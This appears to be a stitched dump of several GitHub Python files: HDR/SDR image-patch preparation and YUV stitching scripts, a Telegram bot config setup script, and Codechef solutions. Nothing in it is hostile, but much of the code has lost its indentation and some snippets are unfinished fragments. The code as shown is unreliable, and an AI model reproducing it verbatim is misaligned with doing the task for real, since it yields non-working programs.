buildFilename = str(allpatches-1).zfill(6)# gives the filename only an number filled up with 6 zeros (mybe better if zeros from max allpatches)
##Compare picture in RGB
savePic(hdr_png_16bit,buildFilename,'png',rgb_hdr) #check Picture
savePic(ldr_8,'lr_'+buildFilename,'png',rgb_sdr) #check Picture
savePic(sdr_32_8bit,buildFilename,'png',rgb_sdr)
savePic(sdr_32,'yuv'+buildFilename,'png',rgb_sdr)
if(youWantYUV != 'no'):
# TODO Add a Input for the wanted out_format
if(testing != 'no'):
spaceIndi = 'y','u','v' #orders the Name to the right place
savePic((ldr_8_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathsdr)#saves final singel color channel Picture y
savePic((ldr_8_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathsdr)#saves final singel color channel Picture u
savePic((ldr_8_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathsdr)#saves final singel color channel Picture v
####Saveing the 16Bit HDR picturespatches
if(hrImgOut !='no'):
savePic((hdr_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'hdr',outPathhdr)#saves final singel color channel Picture
##Compare picture
hdr_yuv_vis = hdr_yuv.astype(np.float32)
savePic(hdr_yuv_vis,'YUV_'+buildFilename,'hdr',rgb_hdr) #check Picture in HDR_YUV_HR
#Saveing the 16Bit PNG output picturepachtes
if(hrImgOut == 'no'):
savePic((hdr_png_yuv[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png_yuv[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png_yuv[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathhdr)#saves final singel color channel Picture
##Compare picture
comp = np.clip(((hdr_png_yuv/((2**10)-1))*((2**16)-1)), 0, ((2**16)-1)).astype(np.uint16) #upconverting to make is visable
savePic(comp,'YUV_'+buildFilename,'png',rgb_hdr) #check Picture
if(testing == 'no'):
if(hrImgOut == 'no'):
savePic(hdr_png_yuv,buildFilename,'png',outPathhdr)#change 'hdr' here for different HDR-picture save
if(hrImgOut != 'no'):
savePic(hdr_yuv,buildFilename,'hdr',outPathhdr)#change 'hdr' here for different HDR-picture save
savePic(ldr_8_yuv,buildFilename,'png',outPathsdr)#chnage 'png' here for different LDR-picture save
#########Normal Section
if(youWantYUV == 'no'):
print('yuV_no')
# TODO Add a Input for the wanted out_format
if(testing != 'no'):
spaceIndi = 'y','u','v' #orders the Name to the right place
savePic((ldr_8[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathsdr)#saves final singel color channel Picture y
savePic((ldr_8[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathsdr)#saves final singel color channel Picture u
savePic((ldr_8[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathsdr)#saves final singel color channel Picture v
savePic(ldr_8,buildFilename,'png',outPathsdr) #check Picture
####Saveing the 16Bit HDR picturespatches
if(hrImgOut !='no'):
savePic((hdr[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic((hdr[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'hdr',outPathhdr)#saves final singel color channel Picture
savePic(hdr,buildFilename,'hdr',outPathhdr) #check Picture
#Saveing the 16Bit PNG output picturepachtes
if(hrImgOut == 'no'):
print('(HDR)-PNG is 16 bit')
savePic((hdr_png[:,:,0]),(str(allpatches-1)+'-'+spaceIndi[0]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png[:,:,1]),(str(allpatches-1)+'-'+spaceIndi[1]),'png',outPathhdr)#saves final singel color channel Picture
savePic((hdr_png[:,:,2]),(str(allpatches-1)+'-'+spaceIndi[2]),'png',outPathhdr)#saves final singel color channel Picture
savePic(hdr_png,buildFilename,'png',outPathhdr) #check Pic
if(testing == 'no'):
if(hrImgOut == 'no'):
savePic(hdr_png,buildFilename,'png',outPathhdr)#change 'hdr' here for different HDR-picture save
if(hrImgOut != 'no'):
savePic(hdr,buildFilename,'hdr',outPathhdr)#change 'hdr' here for different HDR-picture save
savePic(ldr_8,buildFilename,'png',outPathsdr)#chnage 'png' here for different LDR-picture save
###writing SDR array section
p = (allpatches-1) #calcualte current patch position
if (savein == 'm' or savein == 'mp'):
try:
if((youWantYUV == 'no') and (jsi == 'no')):
print('RGB_noJSI')
sdrarray[:,:,:,p] = ldr_8 # clipped the tmoed Picture to 0,1
hdrarray[:,:,:,p] = hdr # try Write the Patch to hdrarray at current patch position
if((youWantYUV != 'no') and (jsi == 'no')):
print('YUV_noJSI')
sdrarray[:,:,:,p] = ldr_8_yuv # clipped the tmoed Picture to 0,1
hdrarray[:,:,:,p] = hdr_yuv # try Write the Patch to hdrarray at current patch position
if((youWantYUV == 'no') and (jsi != 'no')):
print('RGB_JSI')
sdrarray[:,:,:,p] = ldr_8 # try Write the tmoed Patch to sdrarray at current patch position
hdrarray[:,:,:,p] = hdr_png # try Write the Patch to hdrarray at current patch position
if((youWantYUV != 'no') and (jsi != 'no')):
print('YUV_JSI')
sdrarray[:,:,:,p] = ldr_8_yuv # try Write the tmoed Patch to sdrarray at current patch position
hdrarray[:,:,:,p] = hdr_png_yuv # try Write the Patch to hdrarray at current patch position
except:
print('Error at Array Writing :..(')
print(str(originalPicture.shape)+'OrgPicShape')
print('BeginHereX '+str(begx)+' to '+str(px))
print('beginHereY '+str(begy)+' to '+str(py))
print(str(patchCuts.shape)+' PatchCutsAmaount')
print(str(aktPatch)+' PatchPos')
print(str(patchCuts[(aktPatch)])+' PatchCuts_pos')
print(str(patch.shape)+' hdrPatchShape')
                        print(str(ldr_8.shape)+' sdrPatchShape')
allpatches = allpatches - 1 #Counts down all patches of all pictures to 0
print('Patch === '+str(allpatches)+' ==> Done')
else:
print('Error with data maybe not an .hdr file continuing...')
amountOfPictures = amountOfPictures + 1 #couning up the total end goals if not the given input format
tokonvPic = tokonvPic + 1 #couning up the total end goals
except:
try:
print(str(originalPicture.shape)+'OrgPicShape')
print('BeginHereX '+str(begx)+' to '+str(px))
print('beginHereY '+str(begy)+' to '+str(py))
print(str(patchCuts.shape)+' PatchCutsAmaount')
print(str(aktPatch)+' PatchPos')
print(str(patchCuts[(aktPatch)])+' PatchCuts_pos')
print(str(patch.shape)+' hdrPatchShape')
            print(str(ldr_8.shape)+' sdrPatchShape')
except:
print('Error with data maybe not an .hdr file continuing...')
print(str((time.time() - start_time)/60)+' Minutes have pased and '+str(allpatches)+' patches togo :)') #outputs the time in minutes
amountOfPictures = amountOfPictures - 1 #counts down current picture pos
if (savein == 'mp' or savein == 'm' ): #only makes a Matlap File if wanted
try:
matLabel = 'HDR_data'
if(testing != 'no'):
matLabel = 'HDR_YUV'
print('testdata')
# Write TO HDR.Mat File
h5.get_config().default_file_mode = 'a' #write enable
matfilehdrdataHDR = {} # make a dictionary to store the MAT data in
print('HDR Matlab file will have the format')
print(hdrarray.shape)
matfilehdrdataHDR[u''+matLabel] = hdrarray #save hdr array in that dictonary
print('Writing HDR_'+matName+'.mat File to: '+ matPath)
hdf5storage.write(matfilehdrdataHDR, '.', matPath+'HDR_'+matName+'.mat', matlab_compatible=True) #output the .mat data file
print('Saved the HDR .mat file')
#####Writing SDR .mat
#Switches the first with the last array Field
matfilesdrdatasdr = {} # make a dictionary to store the MAT data in
matLabel = 'SDR_data'
if(testing != 'no'):
matLabel = 'SDR_YUV'
print('testdata')
print('SDR Matlab file will have the format')
print(sdrarray.shape)
matfilesdrdatasdr[u''+matLabel] = sdrarray #save sdr array in that dictonary
print('Writing SDR_'+matName+'.mat File to: '+ matPath)
hdf5storage.write(matfilesdrdatasdr, '.', matPath+'SDR_'+matName+'.mat', matlab_compatible=True) #output the .mat data file
print('Saved the SDR .mat file')
except:
print('error at writing matlab file sorry :(')
sdrpro = (np.count_nonzero(sdrarray)/sdrarray.size)*100
print(str(sdrpro)+'% of SDRarray numbers are bigger than 0')
sdrpro = (np.count_nonzero(hdrarray)/hdrarray.size)*100
print(str(sdrpro)+'% of HDRarray numbers are bigger than 0')
print(str((time.time() - start_time)/60)+' Minutes') #outputs the time in minutes
print('------------------------- Done --------------------')
# In[ ]:
#ab = readThePicture('/Users/littledragon/Documents/BA 13022020/programme/MdataPicPrep/sdrOut/000003.png')
#ldr_8_b = (RGBtoYUV(((ldr_8).astype(np.uint8))).astype(np.uint8))
#hdr_png_yuv_b = (ldr_8_b).astype(np.uint8)#*127
#savePic(ldr_8_b,'fileName_letMeTink','png','./sdrOut/')
#ab = (YUVtoRGB(((ldr_8_b).astype(np.uint8))).astype(np.uint8))
#ab = YUVtoRGB(ab)
#savePic((ab),'fileName_letMeTink_rgb','png','./sdrOut/')
#ab = (ab/255).astype(np.float32)
#savePic((ab),'fileName_letMeTink_rgb_hdr','hdr','./sdrOut/')
#hdr_png_yuv_b.max()
# In[ ]:
#hdr_png = hdr*((2**10)-1)
#hdr_png_yuv_c = ((hdr)*((2**16)-1)).astype(np.uint16)
#hdr_png_yuv_c = RGBtoYUV(hdr_png_yuv_c)
#hdr_png_yuv_b = (hdr_png_yuv_c*((2**1)-1)).astype(np.uint16)#*127
#savePic(hdr_png_yuv_c,'fileName_letMeTink','png','./sdrOut/')
#ab = (YUVtoRGB(hdr_png_yuv_c*((2**1)-1)).astype(np.uint16))
#ab = YUVtoRGB(ab)
#savePic((ab),'fileName_letMeTink_rgb','png','./sdrOut/')
#ab = (ab/((2**16)-1)).astype(np.float32)
#savePic((ab),'fileName_letMeTink_rgb_hdr','hdr','./sdrOut/')
#HDR_test = YUVtoRGB((hdr_png_yuv/((2**10)-1)).astype(np.float32))
#savePic(HDR_test,'fileName_letMeTink_rgb_hdr_org','hdr','./sdrOut/')
#hdr_png_yuv_c.max()
```
#### File: 8bignic8/MdataPicPrep/StichingSingleYUVtoRGB.py
```python
import argparse, os
import cv2
import numpy as np
import imageio
import time
# In[40]:
def readPicture(picturepath):
# open ImageObject
img = cv2.imread(picturepath, cv2.IMREAD_UNCHANGED)#cv2.IMREAD_UNCHANGED is important that the output is (x,y,ChannelRGB)
#print(img.shape)
#alternative
#img=imageio.imread(picturepath) #liest Bild von picturepath
return(img)
# In[6]:
def savePic(picture,fileName,extention,outPath):
outPath = outPath+fileName+'.'+extention # combines the path with the name and extention of the file
print(outPath)
try:
#imageio.imwrite(outPath,picture,format=extention)# old way
cv2.imwrite(outPath,picture)#saves Pictures
except:
print('Failed while saving picture: '+fileName+' to '+ outPath+' sorry :(') #writes an error
print('--------------------')
# In[7]:
def YUVtoRGB(img):
pictureYUV = cv2.cvtColor(img, cv2.COLOR_YUV2RGB, cv2.IMREAD_UNCHANGED) #uses the CV2 method to convert the color space from YU-V to RGB
return pictureYUV
# In[8]:
def RGBtoYUV(img):
pictureYUV = cv2.cvtColor(img, cv2.COLOR_RGB2YUV, cv2.IMREAD_UNCHANGED) #uses the CV2 method to convert the color space from RGB to YU-V
return pictureYUV
# In[9]:
def convert(img, target_type_min, target_type_max, target_type):
imin = img.min() # searches for the smalest number in the img array and saves it in imin
imax = img.max() # searches for the biggest number in the img array and saves it in imax
a = (target_type_max - target_type_min) / (imax - imin) # creates ratio of wanted to actual number value space
b = target_type_max - a * imax # Creates the maximal possible value in b
try:
new_img = (a * img + b).astype(target_type) # recalculates the image with the calculated values and sets the new type
except:
print('error while converting the image')
return new_img
# In[34]:
def hdrorpng(extention,yuvPic):
if (extention == 'hdr'): # when hdr than normalize in values between 0 and 1
yuvPic = convert(yuvPic, 0, 1, np.float32) # send to convert in float 32 // Just devide by (2 ** 10) - 1?
if (extention == 'png'): # when hdr than normalize in values between 0 and 255
yuvPic = convert(yuvPic, 0, 255, np.uint8) # normalisation to unit8
return yuvPic
# In[18]:
#toDo Add parser with args
###### Imput section
path = input('Path to pictures that should be converted [default: ./yuvPic/]: ') or './yuvPic/'
inputextention = input('What file extension do the input pictures have? [default: png]') or 'png'
outputextention = input('Please type the output extension [default: hdr]: ') or 'hdr'
outputpath = input('Where to write the stitched pictures to? [default: ./hdrOut/]: ') or './hdrOut/'
namePic = input('What should be the name of the stitched pictures? [default: pred]') or 'predictedPic'
wantYUV = input('Do you want to keep the YUV color space? Type y [default: no (RGB color space)]') or 'no'
aOp = sum(1 for f in os.listdir(path) if f.endswith('.'+inputextention)) #sum all files ending with the extension
# In[37]:
#Working Version 10022021
start_time = time.time() #start Timer
print('Pictures in the folder need to have the format: [number]-[y]or[u]or[v].png e.g. : 28-y_pred.png,28-u_pred.png,28-v_pred.png')
#TO DO Parser
#desc ='yuv to RGB'
#parser = argparse.ArgumentParser(description=desc)
#parser.add_argument('--yuv', type=str, default='./', help='path to Folder of yuv images')
#print(parser.parse_args())
#what, b = parser.parse_known_args()
#if what.yuv == './' :
# print('yes')
start_time = time.time()
i = 0
print(aOp)
while (i <= aOp-1 ): # read y
    if ((str(os.listdir(path)[i]).split('-')[1]).split('_')[0]) == 'y': # only searching for y pictures
name = os.listdir(path)[i] #finding the Name
print(name +' should be the Y')
picpath = path + name #combining Name and path
picy = readPicture(picpath) #reads a pic y to find the x,y axes should be the same for all pictures
yuvPic = np.zeros((int(picy.shape[0]),int(picy.shape[1]),3)) # generates the x and y achses and channels of picture
yuvPic[:,:,1] = picy # packs the Y in pos 1
num = (str(os.listdir(path)[i]).split('-')[0])#.split('_')[0]
newPic = path + num + '-u_'+name.split('_')[1]
picu = readPicture(newPic)#reads a picture with Ending U
yuvPic[:,:,0] = picu # packs the u in pos 0
newPic = path + num + '-v_'+name.split('_')[1] #Generates the Name for v
picv = readPicture(newPic)#reads the new picture with ending V
yuvPic[:,:,2] = picv # packs the u in pos 2
        #Right order for the test data is: 0y 2u 1v <<<<<<<<<<<<<
if(wantYUV != 'y'):
yuvPic = hdrorpng(outputextention,yuvPic) # normalize after conversion
rgbPic = YUVtoRGB(yuvPic) # to YUV to RGB conversion Matrix needs to have the Format Y[0] U[1] V[2]
savePic(rgbPic,(str(i)+namePic),outputextention,outputpath)#saves final RGB pic
if(wantYUV == 'y'):
yuvPic = hdrorpng(outputextention,yuvPic) # normalize after conversion
yuvPic = YUVtoRGB(yuvPic)
savePic(yuvPic,(str(i)+namePic),outputextention,outputpath)#saves final YUV pic
i = i + 1
print("--- %s seconds ---" % (time.time() - start_time))
print(str((time.time() - start_time)/60))
print('------------------------- Done --------------------')
# In[ ]:
# In[ ]:
``` |
{
"source": "8bignic8/mqttBitcoinToTelegambott",
"score": 3
} |
#### File: 8bignic8/mqttBitcoinToTelegambott/setConfig.py
```python
import json
import os
import requests
# In[ ]:
def findID(token):
    if ':' in token: #checks if a valid Telegram token has been entered
method = 'getUpdates' #sets the telegram request status
response = requests.post(
url='https://api.telegram.org/bot{0}/{1}'.format(token, method) #reqets the updates with the token
).json()
chatID = (((response['result'][0])['message'])['chat'])['id'] #searches in the dict for the chat message token
print('Your Chat ID is' + str(chatID)) #shows it to the user
return chatID
else:
print('Not the right Token :/')
# In[ ]:
##Input part
print('You need to set up your Telegram bot and add it to a group with you!! Then send a message in the group to initialize the connection')
token = input('Set your BOT TOKEN e.g.: <PASSWORD>:ssf.......wfVg --> ') or 'ERR'
changeValue = input('Set the value, Bitcoin needs to change to get a Telegram message : (number) default 1000 --> ') or '1000'
mqTTBroker = input('Set your mqTTBroker address e.g.: 192.168.0.42 or localhost --> ') or 'localhost'
mqTTSub = input('Set your mqTTSub for the Bitcoin value e.g.: /home/bitcoin/euro --> ') or '/home/bitcoin/euro'
####Setup config as dict
config = {'myuserid': findID(token),
'token': token,
'changeValue': changeValue,
'mqTTSub':mqTTSub,
'mqTTBroker': mqTTBroker}
# In[ ]:
##Writing JSON with established dict
try:
with open('config.json', 'w', encoding='utf-8') as f: #writing config.json in utf-8
json.dump(config, f)
except:
print('config file write error')
``` |
{
"source": "8Bit1Byte/Codechef-Solutions",
"score": 3
} |
#### File: JUNE21C Competition/MFSS/3.py
```python
from itertools import combinations
from sys import maxsize
class Node(object):
def __init__(self, data):
self.data = data
self.children = []
def add_child(self, obj):
self.children.append(obj)
A = [2, 2, -1, -5, 12, 1]
max = - maxsize
sum_ = list()
sum_.append(A[0])
obj_tree = Node(sum_[0])
result = sum_[0]
M = 10 ** 9 + 7  # assumed modulus; the original snippet never defines M
for i in range(1, len(A)):
    sum_.append(sum_[i - 1] + A[i])
    sum_[i] %= M
```
#### File: JUNE21C Competition/OPTSET/1.py
```python
def maxXorSum(n, k):
if k == 1:
return n
res = 1
l = [1]
while res <= n:
res <<= 1
l.append(res)
print(l)
# return res - 1
n, k = map(int, input().split())
maxXorSum(n, k)
```
#### File: JUNE21C Competition/OPTSET/performace.py
```python
from itertools import combinations
n = int(input())
l = [i for i in range(1, n + 1)]
for k in range(1, n+1):
per_ = list(combinations(l, k))
l_u = []
for i in per_:
res = 0
for j in i:
res ^= j
l_u.append((res, i))
print(max(l_u)[0], '|', *max(l_u)[-1])
# =======================================================
# def maxXORInRange(L, R):
# LXR = L ^ R
# msbPos = 0
# while (LXR):
# msbPos += 1
# LXR >>= 1
# maxXOR, two = 0, 1
# while (msbPos):
# maxXOR += two
# two <<= 1
# msbPos -= 1
# return maxXOR
# L, R = 8, 20
# print(maxXORInRange(L, R))
# from itertools import combinations
# n = int(input())
# l = [i for i in range(1, n + 1)]
# for k in range(1, n+1):
# per_ = list(combinations(l, k))
# l_u = []
# for i in per_:
# res = 0
# for j in i:
# res ^= j
# l_u.append((res, i))
# print(max(l_u)[0], '|', *max(l_u)[-1])
```
#### File: Codechef-Solutions/LTIME96C Competition/HOOPS.py
```python
import os.path
from math import gcd, floor, ceil
from collections import *
import sys
mod = 1000000007
INF = float('inf')
def st(): return list(sys.stdin.readline().strip())
def li(): return list(map(int, sys.stdin.readline().split()))
def ls(): return list(sys.stdin.readline().split())
def mp(): return map(int, sys.stdin.readline().split())
def inp(): return int(sys.stdin.readline())
def pr(n): return sys.stdout.write(str(n)+"\n")
def prl(n): return sys.stdout.write(str(n)+" ")
# for standard i/o
if os.path.exists('input.txt'):
sys.stdin = open('input.txt', 'r')
sys.stdout = open('output.txt', 'w')
def solve(n):
print(n//2+1)
if __name__ == '__main__':
t = inp()
for _ in range(t):
n = inp()
solve(n)
```
#### File: Codechef-Solutions/Practice(Beginner)/FLOW004.py
```python
from sys import stdin
def main(t):
curInx = t
while curInx:
n = stdin.readline()
curInx -= 1
print(int(n[0])+int(n[-2]))
if __name__ == '__main__':
t = int(stdin.readline())
main(t)
```
#### File: Codechef-Solutions/Practice(Beginner)/FLOW015.py
```python
from sys import stdin, stdout
import datetime
def main(t):
for _ in range(t):
stdout.write(f'{datetime.datetime(int(stdin.readline()),1,1).strftime("%A").lower()}'+'\n')
if __name__ == '__main__':
t = int(stdin.readline())
main(t)
```
#### File: Codechef-Solutions/YTPP001 Competition/PECEX1A.py
```python
def solve(m: list):
m.sort()
return m[2]
if __name__ == '__main__':
n = int(input())
for _ in range(n):
m = list(map(int, input().split()))
print(solve(m))
```
#### File: Codechef-Solutions/YTPP001 Competition/PRPRME.py
```python
def primeNum(m):
from math import sqrt
if m == 0 or m == 1: # O(1) constant case time (base case)
return False
if m == 2 or m == 3: # O(1) constant case time (base case)
return True
if m%2 == 0 or m%3 == 0: # O(1)
return False
    for i in range(5, int(sqrt(m))+1, 6):
if m%i == 0 or m%(i+2) == 0:
return False
return True
def solve(m):
i = 0
j = 1
while i < m:
if primeNum(j):
print(j, end=' ')
i += 1
j += 1
if __name__ == '__main__':
n = int(input())
solve(n)
```
#### File: Codechef-Solutions/YTPP001 Competition/SECLAR.py
```python
def solve(n: list):
n_ = n
max_ = max(n_)
n_.remove(max_)
return max(n_)
if __name__ == '__main__':
a = int(input())
b = int(input())
c = int(input())
print(solve([a, b, c]))
``` |
{
"source": "8bitape/AtlasExtruder",
"score": 3
} |
#### File: 8bitape/AtlasExtruder/atlas_extrude.py
```python
import json
from PIL import Image
def extrude(image, sprites, padding):
im = Image.open(image)
pixels = im.load()
atlas = json.load(open(sprites, "r"))
for frame in atlas["frames"]:
x = atlas["frames"][frame]["frame"]["x"]
y = atlas["frames"][frame]["frame"]["y"]
width = atlas["frames"][frame]["sourceSize"]["w"]
height = atlas["frames"][frame]["sourceSize"]["h"]
for i in range(padding):
for j in range (padding):
pixels[x - (i + 1), y - (j + 1)] = pixels[x, y]
pixels[x - (i + 1), y + (height + j)] = pixels[x, y + height - 1]
pixels[x + (width + i), y - (j + 1)] = pixels[x + width - 1, y]
pixels[x + (width + i), y + (height + j)] = pixels[x + width - 1, y + height - 1]
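        # extend the sprite's left and right edge columns into the padding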
for y in range(y, y + height):
for i in range(padding):
pixels[x - (i + 1), y] = pixels[x, y]
pixels[x + (width + i), y] = pixels[x + width - 1, y]
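        # extend the bottom and top edge rows (y now points at the sprite's bottom row)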
for x in range(x, x + width):
for i in range(padding):
pixels[x, y + (i + 1)] = pixels[x, y]
pixels[x, y - (height + i)] = pixels[x, y - height + 1]
im.save(image)
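# Example usage (hypothetical file names); the padded atlas overwrites the input image in place:
# extrude("atlas.png", "atlas.json", padding=2)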
``` |
{
"source": "8bitbuddhist/swearscan",
"score": 3
} |
#### File: 8bitbuddhist/swearscan/swearscan.py
```python
import os
from sourcefile import SourceFile
import argparse
def main(url):
files = []
for root, directories, filenames in os.walk(url):
for filename in filenames:
file = SourceFile(os.path.join(root, filename))
files.append(file)
try:
print("Parsing " + file.fullpath)
file.parse()
if len(file.profanewords) > 0:
for index, word in enumerate(file.profanewords):
print("Line " + str(file.profanelines[index] + 1) + ": " + word)
print("Found " + str(len(file.profanewords)) + " words for a score of " + str(file.profanityscore))
print()
except Exception as ex:
print("Failed to parse file: ", ex)
# Calculate and display statistics
mostprofanefile = max(files, key=lambda curfile: len(curfile.profanewords))
from collections import Counter
mostprofanewords = []
for file in files:
word = file.favoriteprofaneword()
if word is not None:
mostprofanewords.append(word)
if len(mostprofanewords) > 0:
profanewords = Counter(mostprofanewords)
mostcommonprofaneword = [elem[0] for elem in profanewords.most_common(1)][0]
else:
mostcommonprofaneword = "N/A"
print()
print("Total files scanned: " + str(len(files)))
print("Words found: "
+ str(sum(file.profanewordcount[1] for file in files)) + " Mild, "
+ str(sum(file.profanewordcount[2] for file in files)) + " Medium, "
+ str(sum(file.profanewordcount[3] for file in files)) + " Strong, "
+ str(sum(file.profanewordcount[4] for file in files)) + " Very Strong")
totalprofanityscore = sum(file.profanityscore for file in files)
if totalprofanityscore > 0 :
print("Most profane file: " + str(mostprofanefile.fullpath) + " with " + str(len(mostprofanefile.profanewords))
+ " words for a score of " + str(mostprofanefile.profanityscore))
print("Most common word: " + mostcommonprofaneword)
print("Total score: " + str(totalprofanityscore))
parser = argparse.ArgumentParser(description='Scan a directory for profanity.')
parser.add_argument('dir', type=str, nargs=1, help='directory to scan')
args = parser.parse_args()
main(args.dir[0])
``` |
{
"source": "8bitgentleman/fitexport",
"score": 2
} |
#### File: 8bitgentleman/fitexport/main.py
```python
from __future__ import print_function
import json
import time
from os import path, makedirs
import pickle
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import pprint
pp = pprint.PrettyPrinter(indent=4)
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/fitness.activity.read']
# DATA SOURCE
DATA_SOURCE = "derived:com.google.step_count.delta:com.google.android.gms:estimated_steps"
START_TIME = "1051700038292387000-"
# test time
# START_TIME = "1577854800000000000-"
def saveJSON(name, data):
dir_name = path.dirname(path.abspath(__file__))
file_name = "exports/" + name + "-" + str(int(time.time())) + ".json"
full_name = path.join(dir_name, file_name)
with open(full_name, 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
def main():
"""Shows basic usage of the FIT API.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=54547)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('fitness', 'v1', credentials=creds)
# Call the Fitness API
DATA_SET = START_TIME + str(time.time_ns())
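    # The Fit API identifies a dataset as "<startTimeNanos>-<endTimeNanos>"; START_TIME
    # already ends with "-", so appending the current time in ns covers everything up to now.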
data_sources = service.users().dataSources(). \
list(userId='me'). \
execute()
saveJSON("dataSources", data_sources)
# create subdir for datastreams
timestamp = str(time.time_ns())
makedirs(f"exports/segments/{timestamp}")
data_list = []
for index, s in enumerate(data_sources['dataSource']):
try:
dataset = service.users().dataSources(). \
datasets(). \
get(userId='me', dataSourceId=s['dataStreamId'], datasetId=DATA_SET). \
execute()
# saveJSON("segments/" + s['dataStreamId'], dataset)
saveJSON( f"segments/{timestamp}/{s['dataStreamId']}", dataset)
# data_list.append(dataset)
except Exception as e:
print("Error at " + s['dataStreamId'])
print(e)
# saveJSON("dataset", data_list)
if __name__ == '__main__':
main()
``` |
{
"source": "8bitidea/omac-solved-lessons-",
"score": 4
} |
#### File: omac-solved-lessons-/code/L14-9.py
```python
def product_list(list_of_numbers):
r = 1
x= 0
while x < len(list_of_numbers):
r = r * list_of_numbers[x]
x+=1
return r
print product_list([9])
#>>> 9
print product_list([1,2,3,4])
#>>> 24
print product_list([])
#>>> 1
```
#### File: omac-solved-lessons-/code/L18-5.py
```python
import turtle
def draw_square():
w = turtle.Screen()
w.bgcolor("green")
t = turtle.Turtle()
t.shape("turtle")
t.speed(1)
t.color("blue")
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
# t.right(90)
w.exitonclick()
draw_square()
``` |
{
"source": "8BitJosh/WhosHome",
"score": 2
} |
#### File: WhosHome/main/main.py
```python
from aiohttp import web
import socketio
import asyncio
import subprocess
import json
from datetime import datetime
import os
from xmljson import badgerfish as bf
from xml.etree.ElementTree import fromstring
socketio = socketio.AsyncServer()
app = web.Application()
socketio.attach(app)
loop = asyncio.get_event_loop()
ipRange = '192.168.0.0/24'
scaninterval = 300
Users = {}
if not os.path.isfile('Users.json'):
with open('Users.json', 'w') as file:
json.dump({}, file)
with open('Users.json', 'r') as file:
Users = json.load(file)
async def index(request):
return web.FileResponse('./main/templates/index.html')
@socketio.on('getTable', namespace='/main')
async def whoshome(sid):
global Users
await socketio.emit('table', Users, namespace='/main', room=sid)
@socketio.on('addUser', namespace='/main')
async def addUser(sid, data):
global Users
if data['mac'] not in Users:
return 0
Users[data['mac']]['name'] = data['name']
print(data)
saveFile()
await socketio.emit('table', Users, namespace='/main')
def saveFile():
global Users
with open('Users.json', 'w') as file:
print('Saving file - ' + datetime.now().strftime("[%d/%m/%y %H:%M:%S]"))
json.dump(Users, file)
async def updateNmap():
global Users
global scaninterval
await asyncio.sleep(20)
while True:
p = subprocess.Popen(['sudo','nmap','-oX','-','-sn',ipRange],
bufsize=10000,stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(temp_xml,temp_err) = p.communicate()
temp_json=bf.data(fromstring(temp_xml))
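        # badgerfish puts XML attributes under '@'-prefixed keys, e.g. the number of
        # hosts that responded ends up at temp_json['nmaprun']['runstats']['hosts']['@up']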
tempUsers = Users
timeNow = datetime.now().strftime("[%d/%m/%y %H:%M:%S]")
print('Scan run at {} in {} seconds, hosts up: {}'.format(timeNow,
temp_json['nmaprun']['runstats']['finished']['@elapsed'],
temp_json['nmaprun']['runstats']['hosts']['@up']), flush=True)
for key in tempUsers:
tempUsers[key]['online'] = 0
for y in range(0,temp_json['nmaprun']['runstats']['hosts']['@up']):
mac = "none"
ip = "none"
ipv6 = "none"
if len(temp_json['nmaprun']['host'][y]['hostnames']) > 0:
hostname = temp_json['nmaprun']['host'][y]['hostnames']['hostname']['@name']
else:
hostname = "none"
host_state = temp_json['nmaprun']['host'][y]['status']['@state']
if type(temp_json['nmaprun']['host'][y]['address']) == list:
for x in range(0,len(temp_json['nmaprun']['host'][y]['address'])):
temp_addr = temp_json['nmaprun']['host'][y]['address'][x]['@addr']
temp_addr_type = temp_json['nmaprun']['host'][y]['address'][x]['@addrtype']
if temp_addr_type == "ipv4":
ip = temp_addr
elif temp_addr_type == "ipv6":
ipv6 = temp_addr
elif temp_addr_type == "mac":
mac = temp_addr
else:
continue
if mac not in tempUsers:
tempUsers[mac] = {}
if 'name' not in tempUsers[mac]:
tempUsers[mac]['name'] = 'undefined'
tempUsers[mac]['upTime'] = 0
tempUsers[mac]['ip'] = ip
tempUsers[mac]['last'] = timeNow
tempUsers[mac]['online'] = 1
tempUsers[mac]['upTime'] += scaninterval
Users = tempUsers
await socketio.emit('table', Users, namespace='/main')
saveFile()
await asyncio.sleep(scaninterval)
loop.create_task(updateNmap())
app.router.add_get('/', index)
app.router.add_static('/static/', path=str('./main/static'), name='static')
web.run_app(app, port=8080)
``` |
{
"source": "8bitkitkat/xx",
"score": 3
} |
#### File: 8bitkitkat/xx/example_premake.py
```python
